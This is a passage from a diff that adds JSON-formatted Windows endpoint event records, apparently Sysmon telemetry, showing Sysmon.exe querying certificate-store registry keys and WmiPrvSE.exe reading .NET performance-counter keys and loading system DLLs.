"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 4292, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\.NET CLR Data", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\.NET CLR Data\\Linkage", + "registry_value": "Linkage", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 4292, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\.NET CLR Networking", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\.NET CLR Networking\\Linkage", + "registry_value": "Linkage", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 4292, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\.NET CLR Networking 4.0.0.0", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\.NET CLR Networking 4.0.0.0\\Linkage", + "registry_value": "Linkage", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "netfxperf.dll", + "image_path": "C:\\Windows\\System32\\netfxperf.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 4292, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\.NET Memory Cache 4.0", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\.NET Memory Cache 4.0\\Linkage", + "registry_value": "Linkage", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 4292, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\MSDTC Bridge 4.0.0.0", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\MSDTC Bridge 4.0.0.0\\Linkage", + "registry_value": "Linkage", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 4292, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\SMSvcHost 4.0.0.0", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\SMSvcHost 4.0.0.0\\Linkage", + "registry_value": "Linkage", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 4292, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Windows Workflow Foundation 4.0.0.0", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Windows Workflow Foundation 4.0.0.0\\Linkage", + "registry_value": "Linkage", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "wtsapi32.dll", + "image_path": "C:\\Windows\\System32\\wtsapi32.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "CORPerfMonExt.dll", + "image_path": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\CORPerfMonExt.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456050000, + "unique_pid": 